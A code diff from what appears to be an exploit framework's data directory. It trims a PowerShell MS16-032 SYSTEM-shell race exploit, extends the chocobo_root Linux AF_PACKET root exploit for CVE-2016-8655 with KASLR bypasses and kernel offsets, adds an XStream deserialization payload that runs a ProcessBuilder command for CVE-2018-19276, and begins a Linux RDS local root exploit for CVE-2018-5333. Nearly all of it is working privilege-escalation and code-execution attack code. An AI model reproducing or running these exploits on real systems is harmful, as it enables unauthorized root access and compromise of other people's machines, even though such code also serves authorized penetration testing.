-        $CallResult = [Kernel32]::ResumeThread($Thread)
-    }
-
-    # main() <--- ;)
-
-    # Check logical processor count, race condition requires 2+
-    echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
-    if ($([System.Environment]::ProcessorCount) -lt 2) {
-        echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
-        Return
-    }
-
-    # Create array for Threads & TID's
-    $ThreadArray = @()
-    $TidArray = @()
-
-    echo "[>] Duplicating CreateProcessWithLogonW handles.."
-    # Loop 1 is fine, this never fails unless patched in which case the handle is 0
-    for ($i=0; $i -lt 1; $i++) {
-        $hThread = Get-ThreadHandle
-        $hThreadID = [Kernel32]::GetThreadId($hThread)
-        # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
-        if ($TidArray -notcontains $hThreadID) {
-            $TidArray += $hThreadID
-            if ($hThread -ne 0) {
-                $ThreadArray += $hThread # This is what we need!
-            }
-        }
-    }
-
-    if ($($ThreadArray.length) -eq 0) {
-        echo "[!] No valid thread handles were captured, exiting!"
-        Return
-    } else {
-        echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"
-        echo "`n[?] Thread handle list:"
-        $ThreadArray
-    }
-
-    echo "`n[*] Sniffing out privileged impersonation token.."
-    foreach ($Thread in $ThreadArray){
-
-        # Get handle to SYSTEM access token
-        Get-SystemToken
-
-        echo "`n[*] Sniffing out SYSTEM shell.."
-        echo "`n[>] Duplicating SYSTEM token"
-        $hDuplicateTokenHandle = [IntPtr]::Zero
-        $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
-
-        # Simple PS runspace definition
-        echo "[>] Starting token race"
-        $Runspace = [runspacefactory]::CreateRunspace()
-        $StartTokenRace = [powershell]::Create()
-        $StartTokenRace.runspace = $Runspace
-        $Runspace.Open()
-        [void]$StartTokenRace.AddScript({
-            Param ($Thread, $hDuplicateTokenHandle)
-            while ($true) {
-                $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)
-            }
-        }).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)
-        $AscObj = $StartTokenRace.BeginInvoke()
-
-        echo "[>] Starting process race"
-        # Adding a timeout (10 seconds) here to safeguard from edge-cases
-        $SafeGuard = [diagnostics.stopwatch]::StartNew()
-        while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
-        # StartupInfo Struct
-        $StartupInfo = New-Object STARTUPINFO
-        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
-
-        # ProcessInfo Struct
-        $ProcessInfo = New-Object PROCESS_INFORMATION
-
-        # CreateProcessWithLogonW --> lpCurrentDirectory
-        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
-
-        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
-        $CallResult = [Advapi32]::CreateProcessWithLogonW(
-            "user", "domain", "pass",
-            0x00000002, $cmd, $args1,
-            0x00000004, $null, $GetCurrentPath,
-            [ref]$StartupInfo, [ref]$ProcessInfo)
-
-    #---
-    # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
-    #---
-    # Missing this check used to cause the exploit to fail sometimes.
-    # If CreateProcessWithLogon fails OpenProcessToken won't succeed
-    # but we obviously don't have a SYSTEM shell :'( . Should be 100%
-    # reliable now!
-    #---
-    if (!$CallResult) {
-        continue
-    }
-
-        $hTokenHandle = [IntPtr]::Zero
-        $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
-
-        # If we can't open the process token it's a SYSTEM shell!
-        if (!$CallResult) {
-            echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
-            $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
-            $StartTokenRace.Stop()
-            $SafeGuard.Stop()
-            Return
-        }
-
-        # Clean up suspended process
-        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
-        }
-
-        # Kill runspace & stopwatch if edge-case
-        $StartTokenRace.Stop()
-        $SafeGuard.Stop()
-    }
-    exit
+	}
+	
+	# Kill runspace & stopwatch if edge-case
+	$StartTokenRace.Stop()
+	$SafeGuard.Stop()
+#}

data/exploits/CVE-2016-8655/chocobo_root.c

@@ -1,7 +1,7 @@
 /*
 chocobo_root.c
 linux AF_PACKET race condition exploit for CVE-2016-8655.
-Includes KASLR and SMEP/SMAP bypasses.
+Includes KASLR and SMEP bypasses. No SMAP bypass.
 For Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.
 All kernel offsets have been tested on Ubuntu / Linux Mint.
 
@@ -11,7 +11,7 @@ user@ubuntu:~$ uname -a
 Linux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 user@ubuntu:~$ id
 uid=1000(user) gid=1000(user) groups=1000(user)
-user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread
+user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread -Wall
 user@ubuntu:~$ ./chocobo_root
 linux AF_PACKET race condition exploit by rebel
 kernel version: 4.4.0-51-generic #72
@@ -75,7 +75,7 @@ Updated by <bcoles@gmail.com>
 - check number of CPU cores
 - KASLR bypasses
 - additional kernel targets
-https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
+https://github.com/bcoles/kernel-exploits/tree/master/CVE-2016-8655
 */
 
 #define _GNU_SOURCE
@@ -85,13 +85,13 @@ https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
 #include <pthread.h>
 #include <sched.h>
 #include <signal.h>
-#include <stdbool.h>
 #include <stdint.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
-
+#include <linux/if_packet.h>
+#include <netinet/in.h>
 #include <sys/klog.h>
 #include <sys/mman.h>
 #include <sys/types.h>
@@ -102,12 +102,6 @@ https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
 #include <sys/utsname.h>
 #include <sys/wait.h>
 
-#include <arpa/inet.h>
-#include <linux/if_packet.h>
-#include <linux/sched.h>
-#include <netinet/tcp.h>
-#include <netinet/if_ether.h>
-
 #define DEBUG
 
 #ifdef DEBUG
@@ -116,9 +110,18 @@ https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
 #  define dprintf
 #endif
 
-#define ENABLE_KASLR_BYPASS 1
+#define ENABLE_SYSTEM_CHECKS		1
+#define ENABLE_KASLR_BYPASS		1
 
-// Will be overwritten if ENABLE_KASLR_BYPASS
+#if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN		0xffffffff00000000ul
+#  define KERNEL_BASE_MAX		0xffffffffff000000ul
+#  define ENABLE_KASLR_BYPASS_KALLSYMS	1
+#  define ENABLE_KASLR_BYPASS_SYSLOG	1
+#  define ENABLE_KASLR_BYPASS_MINCORE	1
+#endif
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
 unsigned long KERNEL_BASE = 0xffffffff81000000ul;
 
 // Will be overwritten by detect_versions()
@@ -131,6 +134,7 @@ const char *SYSCTL_PATH = "/proc/sys/hack";
 volatile int barrier = 1;
 volatile int vers_switcher_done = 0;
 
+// kernel target struct
 struct kernel_info {
     char *kernel_version;
     unsigned long proc_dostring;
@@ -139,6 +143,7 @@ struct kernel_info {
     unsigned long set_memory_rw;
 };
 
+// Targets
 struct kernel_info kernels[] = {
     { "4.4.0-21-generic #37~14.04.1-Ubuntu", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },
     { "4.4.0-22-generic #40~14.04.1-Ubuntu", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },
@@ -170,6 +175,16 @@ struct kernel_info kernels[] = {
     { "4.4.0-47-generic #68-Ubuntu", 0x088040, 0xe48f80, 0x287800, 0x06f320 },
     //{"4.4.0-49-generic #70-Ubuntu",0x088090,0xe48f80,0x287d40,0x06f320},
     { "4.4.0-51-generic #72-Ubuntu", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},
+
+    { "4.4.0-21-lowlatency #37-Ubuntu",  0x88960, 0xe48e80, 0x28c3a0, 0x6fae0 },
+    { "4.4.0-22-lowlatency #40-Ubuntu",  0x889c0, 0xe48f00, 0x28c570, 0x6fae0 },
+    { "4.4.0-24-lowlatency #43-Ubuntu",  0x88ae0, 0xe48f00, 0x28c9a0, 0x6fae0 },
+    { "4.4.0-28-lowlatency #47-Ubuntu",  0x88b20, 0xe48f80, 0x28ce20, 0x6fae0 },
+    { "4.4.0-31-lowlatency #50-Ubuntu",  0x88b20, 0xe48f80, 0x28cf10, 0x6fae0 },
+    { "4.4.0-34-lowlatency #53-Ubuntu",  0x88b20, 0xe48f80, 0x28cf50, 0x6fae0 },
+    { "4.4.0-36-lowlatency #55-Ubuntu",  0x88b00, 0xe48f80, 0x28cf30, 0x6fad0 },
+    { "4.4.0-38-lowlatency #57-Ubuntu",  0x88bd0, 0xe48f80, 0x28d580, 0x6fad0 },
+    { "4.4.0-42-lowlatency #62-Ubuntu",  0x88c30, 0xe48f80, 0x28d5b0, 0x6faa0 },
 };
 
 #define VSYSCALL              0xffffffffff600000
@@ -202,6 +217,7 @@ struct tpacket_req3 tp;
 int sfd;
 int mapped = 0;
 
+// timer_list struct defined in: include/linux/timer.h
 struct timer_list {
     void *next;
     void *prev;
@@ -255,6 +271,10 @@ void *vers_switcher(void *arg)
 #define BUFSIZE 1408
 char exploitbuf[BUFSIZE];
 
+#ifndef ETH_P_ARP
+#    define ETH_P_ARP 0x0806
+#endif
+
 void kmalloc(void)
 {
     while(1)
@@ -266,7 +286,7 @@ void pad_kmalloc(void)
     int x;
     for (x = 0; x < KMALLOC_PAD; x++)
         if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {
-            dprintf("[-] pad_kmalloc() socket error\n");
+            dprintf("[-] pad_kmalloc() socket error: %m\n");
             exit(EXIT_FAILURE);
         }
 }
@@ -289,7 +309,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
     sigaddset(&set, SIGSEGV);
 
     if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {
-        dprintf("[-] couldn't set sigmask\n");
+        dprintf("[-] couldn't set sigmask: %m\n");
         exit(1);
     }
 
@@ -300,7 +320,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
     fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
 
     if (fd == -1) {
-        dprintf("[-] target socket error\n");
+        dprintf("[-] target socket error: %m\n");
         exit(1);
     }
 
@@ -324,7 +344,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
     sfd = fd;
 
     if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {
-        dprintf("[-] Error creating thread\n");
+        dprintf("[-] Error creating thread: %m\n");
         return 1;
     }
 
@@ -360,7 +380,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
     pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);
 
     if (pbd == MAP_FAILED) {
-        dprintf("[-] could not map pbd\n");
+        dprintf("[-] could not map pbd: %m\n");
         exit(1);
     } else {
         off = pbd->hdr.bh1.offset_to_first_pkt;
@@ -415,13 +435,13 @@ void *modify_vsyscall(void *arg)
     sigaddset(&set, SIGSEGV);
 
     if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {
-        dprintf("[-] couldn't set sigmask\n");
+        dprintf("[-] couldn't set sigmask: %m\n");
         exit(EXIT_FAILURE);
     }
 
     signal(SIGSEGV, catch_sigsegv);
 
-    *vsyscall = 0xdeadbeef+x;
+    *vsyscall = 0xdeadbeef + x;
 
     if (*vsyscall == 0xdeadbeef+x) {
         dprintf("[~] vsyscall page altered!\n");
@@ -449,7 +469,7 @@ void verify_stage1(void)
             exit(0);
         }
 
-        write(2,".",1);
+        write(2, ".", 1);
         sleep(1);
     }
 
@@ -471,7 +491,7 @@ void verify_stage2(void)
             exit(0);
         }
 
-        write(2,".",1);
+        write(2, ".", 1);
         sleep(1);
     }
 
@@ -548,7 +568,29 @@ void wrapper(void)
 
 // * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
 
-void check_procs() {
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+    int f = open(file, O_RDONLY);
+    if (f == -1)
+        return -1;
+    int bytes_read = 0;
+    while (1) {
+        int bytes_to_read = CHUNK_SIZE;
+        if (bytes_to_read > max_length - bytes_read)
+            bytes_to_read = max_length - bytes_read;
+        int rv = read(f, &buffer[bytes_read], bytes_to_read);
+        if (rv == -1)
+            return -1;
+        bytes_read += rv;
+        if (rv == 0)
+            return bytes_read;
+    }
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+void check_env() {
     int min_procs = 2;
 
     int nprocs = 0;
@@ -559,7 +601,24 @@ void check_procs() {
         exit(EXIT_FAILURE);
     }
 
-    dprintf("[.] system has %d processor cores\n", nprocs);
+    char buffer[PROC_CPUINFO_LENGTH];
+    char* path = "/proc/cpuinfo";
+    int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+    if (length == -1) {
+        dprintf("[-] open/read(%s): %m\n", path);
+        exit(EXIT_FAILURE);
+    }
+
+    char* found = memmem(&buffer[0], length, "smap", 4);
+    if (found != NULL) {
+        dprintf("[-] SMAP detected, no bypass available\n");
+        exit(EXIT_FAILURE);
+    }
+
+    struct stat st;
+    if (stat("/dev/grsec", &st) == 0) {
+        dprintf("[!] Warning: grsec is in use\n");
+    }
 }
 
 struct utsname get_kernel_version() {
@@ -573,10 +632,11 @@ struct utsname get_kernel_version() {
 }
 
 #define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define KERNEL_VERSION_SIZE_BUFFER 512
 
 void detect_versions() {
     struct utsname u;
-    char kernel_version[512];
+    char kernel_version[KERNEL_VERSION_SIZE_BUFFER];
 
     u = get_kernel_version();
 
@@ -591,7 +651,7 @@ void detect_versions() {
     }
 
     char *u_ver = strtok(u.version, " ");
-    snprintf(kernel_version, 512, "%s %s", u.release, u_ver);
+    snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);
 
     int i;
     for (i = 0; i < ARRAY_SIZE(kernels); i++) {
@@ -607,15 +667,17 @@ void detect_versions() {
 }
 
 // * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
 
+#if ENABLE_KASLR_BYPASS_SYSLOG
 #define SYSLOG_ACTION_READ_ALL 3
 #define SYSLOG_ACTION_SIZE_BUFFER 10
 
-bool mmap_syslog(char** buffer, int* size) {
+int mmap_syslog(char** buffer, int* size) {
     *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
     if (*size == -1) {
         dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
-        return false;
+        return 0;
     }
 
     *size = (*size / getpagesize() + 1) * getpagesize();
@@ -625,16 +687,17 @@ bool mmap_syslog(char** buffer, int* size) {
     *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
     if (*size == -1) {
         dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
-        return false;
+        return 0;
     }
 
-    return true;
+    return 1;
 }
 
 unsigned long get_kernel_addr_trusty(char* buffer, int size) {
     const char* needle1 = "Freeing unused";
     char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL) return 0;
+    if (substr == NULL)
+        return 0;
 
     int start = 0;
     int end = 0;
@@ -642,22 +705,25 @@ unsigned long get_kernel_addr_trusty(char* buffer, int size) {
 
     const char* needle2 = "ffffff";
     substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL) return 0;
+    if (substr == NULL)
+        return 0;
 
     char* endptr = &substr[16];
-    unsigned long r = strtoul(&substr[0], &endptr, 16);
+    unsigned long addr = strtoul(&substr[0], &endptr, 16);
 
-    r &= 0xffffffffff000000ul;
+    addr &= 0xffffffffff000000ul;
 
-    return r;
+    if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+        return addr;
+
+    return 0;
 }
 
 unsigned long get_kernel_addr_xenial(char* buffer, int size) {
     const char* needle1 = "Freeing unused";
     char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL) {
+    if (substr == NULL)
         return 0;
-    }
 
     int start = 0;
     int end = 0;
@@ -666,17 +732,19 @@ unsigned long get_kernel_addr_xenial(char* buffer, int size) {
 
     const char* needle2 = "ffffff";
     substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL) {
+    if (substr == NULL)
         return 0;
-    }
 
     char* endptr = &substr[16];
-    unsigned long r = strtoul(&substr[0], &endptr, 16);
+    unsigned long addr = strtoul(&substr[0], &endptr, 16);
 
-    r &= 0xfffffffffff00000ul;
-    r -= 0x1000000ul;
+    addr &= 0xfffffffffff00000ul;
+    addr -= 0x1000000ul;
 
-    return r;
+    if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+        return addr;
+
+    return 0;
 }
 
 unsigned long get_kernel_addr_syslog() {
@@ -699,9 +767,12 @@ unsigned long get_kernel_addr_syslog() {
 
     return addr;
 }
+#endif
 
 // * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt
 
+#if ENABLE_KASLR_BYPASS_KALLSYMS
 unsigned long get_kernel_addr_kallsyms() {
     FILE *f;
     unsigned long addr = 0;
@@ -713,7 +784,7 @@ unsigned long get_kernel_addr_kallsyms() {
     dprintf("[.] trying %s...\n", path);
     f = fopen(path, "r");
     if (f == NULL) {
-        dprintf("[-] open/read(%s)\n", path);
+        dprintf("[-] open/read(%s): %m\n", path);
         return 0;
     }
 
@@ -734,58 +805,23 @@ unsigned long get_kernel_addr_kallsyms() {
     dprintf("[-] kernel base not found in %s\n", path);
     return 0;
 }
-
-// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
-
-unsigned long get_kernel_addr_sysmap() {
-    FILE *f;
-    unsigned long addr = 0;
-    char path[512] = "/boot/System.map-";
-    char version[32];
-
-    struct utsname u;
-    u = get_kernel_version();
-    strcat(path, u.release);
-    dprintf("[.] trying %s...\n", path);
-    f = fopen(path, "r");
-    if (f == NULL) {
-        dprintf("[-] open/read(%s)\n", path);
-        return 0;
-    }
-
-    char dummy;
-    char sname[256];
-    char* name = "startup_64";
-    int ret = 0;
-    while (ret != EOF) {
-        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
-        if (ret == 0) {
-            fscanf(f, "%s\n", sname);
-            continue;
-        }
-        if (!strcmp(name, sname)) {
-            fclose(f);
-            return addr;
-        }
-    }
-
-    fclose(f);
-    dprintf("[-] kernel base not found in %s\n", path);
-    return 0;
-}
+#endif
 
 // * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
 
+#if ENABLE_KASLR_BYPASS_MINCORE
 unsigned long get_kernel_addr_mincore() {
-    unsigned char buf[getpagesize()/sizeof(unsigned char)];
+    unsigned char buf[getpagesize() / sizeof(unsigned char)];
     unsigned long iterations = 20000000;
     unsigned long addr = 0;
 
     dprintf("[.] trying mincore info leak...\n");
+
     /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
     if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,
-        MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
-        dprintf("[-] mmap()\n");
+          MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+        dprintf("[-] mmap(): %m\n");
         return 0;
     }
 
@@ -793,46 +829,50 @@ unsigned long get_kernel_addr_mincore() {
     for (i = 0; i <= iterations; i++) {
         /* Touch a mishandle with this type mapping */
         if (mincore((void*)0x86000000, 0x1000000, buf)) {
-            dprintf("[-] mincore()\n");
+            dprintf("[-] mincore(): %m\n");
             return 0;
         }
 
         int n;
-        for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {
+        for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
             addr = *(unsigned long*)(&buf[n]);
             /* Kernel address space */
-            if (addr > 0xffffffff00000000) {
+            if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
                 addr &= 0xffffffffff000000ul;
                 if (munmap((void*)0x66000000, 0x20000000000))
-                    dprintf("[-] munmap()\n");
+                    dprintf("[-] munmap(): %m\n");
                 return addr;
             }
         }
     }
 
     if (munmap((void*)0x66000000, 0x20000000000))
-        dprintf("[-] munmap()\n");
+      dprintf("[-] munmap(): %m\n");
 
     dprintf("[-] kernel base not found in mincore info leak\n");
     return 0;
 }
+#endif
 
 // * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
 
 unsigned long get_kernel_addr() {
     unsigned long addr = 0;
 
+#if ENABLE_KASLR_BYPASS_KALLSYMS
     addr = get_kernel_addr_kallsyms();
     if (addr) return addr;
+#endif
 
-    addr = get_kernel_addr_sysmap();
-    if (addr) return addr;
-
+#if ENABLE_KASLR_BYPASS_SYSLOG
     addr = get_kernel_addr_syslog();
     if (addr) return addr;
+#endif
 
+#if ENABLE_KASLR_BYPASS_MINCORE
     addr = get_kernel_addr_mincore();
     if (addr) return addr;
+#endif
 
     dprintf("[-] KASLR bypass failed\n");
     exit(EXIT_FAILURE);
@@ -851,7 +891,7 @@ void launch_rootshell(void)
     fd = open(SYSCTL_PATH, O_WRONLY);
 
     if(fd == -1) {
-        dprintf("[-] could not open %s\n", SYSCTL_PATH);
+        dprintf("[-] open(%s): %m\n", SYSCTL_PATH);
         exit(EXIT_FAILURE);
     }
 
@@ -877,12 +917,12 @@ void launch_rootshell(void)
 
 void setup_sandbox() {
     if (unshare(CLONE_NEWUSER) != 0) {
-        dprintf("[-] unshare(CLONE_NEWUSER)\n");
+        dprintf("[-] unshare(CLONE_NEWUSER): %m\n");
         exit(EXIT_FAILURE);
     }
 
     if (unshare(CLONE_NEWNET) != 0) {
-        dprintf("[-] unshare(CLONE_NEWNET)\n");
+        dprintf("[-] unshare(CLONE_NEWNET): %m\n");
         exit(EXIT_FAILURE);
     }
 }
@@ -890,8 +930,6 @@ void setup_sandbox() {
 int main(int argc, char **argv)
 {
     int status, pid;
-    struct utsname u;
-    char buf[512], *f;
 
     if (getuid() == 0 && geteuid() == 0) {
         chown("/proc/self/exe", 0, 0);
@@ -908,11 +946,11 @@ int main(int argc, char **argv)
 
     dprintf("linux AF_PACKET race condition exploit by rebel\n");
 
-    dprintf("[.] starting\n");
-
-    dprintf("[.] checking hardware\n");
-    check_procs();
-    dprintf("[~] done, hardware looks good\n");
+#if ENABLE_SYSTEM_CHECKS
+    dprintf("[.] checking system\n");
+    check_env();
+    dprintf("[~] done, looks good\n");
+#endif
 
     dprintf("[.] checking kernel version\n");
     detect_versions();

data/exploits/CVE-2018-19276/payload.erb

@@ -0,0 +1,54 @@
+<map>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+        <dataHandler>
+          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+            <is class="javax.crypto.CipherInputStream">
+              <cipher class="javax.crypto.NullCipher">
+                <initialized>false</initialized>
+                <opmode>0</opmode>
+                <serviceIterator class="javax.imageio.spi.FilterIterator">
+                  <iter class="javax.imageio.spi.FilterIterator">
+                    <iter class="java.util.Collections$EmptyIterator"/>
+                    <next class="java.lang.ProcessBuilder">
+                      <command>
+                        <%=payload_cmd%>
+                      </command>
+                      <redirectErrorStream>false</redirectErrorStream>
+                    </next>
+                  </iter>
+                  <filter class="javax.imageio.ImageIO$ContainsFilter">
+                    <method>
+                      <class>java.lang.ProcessBuilder</class>
+                      <name>start</name>
+                      <parameter-types/>
+                    </method>
+                    <name>foo</name>
+                  </filter>
+                  <next class="string">foo</next>
+                </serviceIterator>
+                <lock/>
+              </cipher>
+              <input class="java.lang.ProcessBuilder$NullInputStream"/>
+              <ibuffer></ibuffer>
+              <done>false</done>
+              <ostart>0</ostart>
+              <ofinish>0</ofinish>
+              <closed>false</closed>
+            </is>
+            <consumed>false</consumed>
+          </dataSource>
+          <transferFlavors/>
+        </dataHandler>
+        <dataLen>0</dataLen>
+      </value>
+    </jdk.nashorn.internal.objects.NativeString>
+    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+</map>

data/exploits/CVE-2018-5333/cve-2018-5333.c

@@ -0,0 +1,883 @@
+// Local root exploit for Linux RDS rds_atomic_free_op NULL pointer dereference
+// in the rds kernel module in the Linux kernel through 4.14.13 (CVE-2018-5333).
+//
+// Includes KASLR, SMEP, and mmap_min_addr bypasses. No SMAP bypass.
+//
+// Targets:
+// - Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116
+// - Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54
+//
+// The rds kernel module is not loaded by default on Ubuntu, and is blacklisted
+// in /etc/modprobe.d/blacklist-rare-network.conf to prevent autoloading.
+// - install: sudo apt install "linux-image-extra-$(uname -r)-generic"
+// - load:    sudo insmod "/lib/modules/$(uname -r)/kernel/net/rds/rds.ko"
+//
+// This exploit is a modified extension of the original local root
+// proof of concept exploit written by wbowling as an example of using
+// CVE-2019-9213 to make previous kernel bugs exploitable:
+// - https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4
+//
+// The original exploit is based on the null pointer dereference
+// reproducer proof of concept and analysis by 0x36:
+// - https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+//
+// wbowling has done most of the hard work, by utilising Jann Horn's
+// mmap_min_addr bypass technique (CVE-2019-9213), allowing userland to mmap
+// virtual address 0 (without which this bug would not be exploitable on
+// systems with a sufficiently large value for vm.mmap_min_addr);
+// and developing the appropriate ROP chain.
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+//
+// This exploit adds offsets for additional kernels, and introduces some
+// additional features, such as KASLR bypasses and system checks, including:
+// - check if system supports SMAP
+// - check if system supports RDS sockets
+// - Jann Horn's mincore KASLR bypass via heap page disclosure (CVE-2017-16994)
+//   - https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+// - spender's /proc/kallsyms KASLR bypass (requires kernel.kptr_restrict=0)
+//   - https://grsecurity.net/~spender/exploits/exploit.txt
+// - xairy's syslog KASLR bypass (requires kernel.dmesg_restrict=0)
+//   - https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+// - lizzie's perf_event_open KASLR bypass (requires kernel.perf_event_paranoid<2)
+//   - https://blog.lizzie.io/kaslr-and-perf.html
+//
+// Shoutout to nstarke for adding additional kernel offsets.
+// - https://github.com/bcoles/kernel-exploits/pulls?q=author:nstarke+cve-2018-5333
+//
+// This exploit also uses various code patterns copied from:
+// - xairy's exploits:
+//   - https://github.com/xairy/kernel-exploits
+// - vnik's kernel ROP code:
+//   - https://github.com/vnik5287/kernel_rop
+// ---
+// $ gcc cve-2018-5333.c -o cve-2018-5333 -Wall
+// $ ./cve-2018-5333
+// Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)
+// [.] checking kernel version...
+// [.] kernel version '4.4.0-116-generic #140-Ubuntu' detected
+// [~] done, version looks good
+// [.] checking system...
+// [~] done, looks good
+// [.] mapping null address...
+// [~] done, mapped null address
+// [.] KASLR bypass enabled, getting kernel base address
+// [.] trying /proc/kallsyms...
+// [-] kernel base not found in /proc/kallsyms
+// [.] trying syslog...
+// [-] kernel base not found in syslog
+// [.] trying perf_event_open sampling...
+// [.] done, kernel text:   ffffffff9f000000
+// [.] commit_creds:        ffffffff9f0a4cf0
+// [.] prepare_kernel_cred: ffffffff9f0a50e0
+// [.] mmapping fake stack...
+// [~] done, fake stack mmapped
+// [.] executing payload 0x402119...
+// [+] got root
+// # id
+// uid=0(root) gid=0(root) groups=0(root)
+// ---
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-5333
+// <bcoles@gmail.com>
+
+#define _GNU_SOURCE
+
+#include <fcntl.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <linux/perf_event.h>
+#include <netinet/in.h>
+#include <sys/ioctl.h>
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/utsname.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define ENABLE_SYSTEM_CHECKS            1
+#define ENABLE_KASLR_BYPASS             1
+
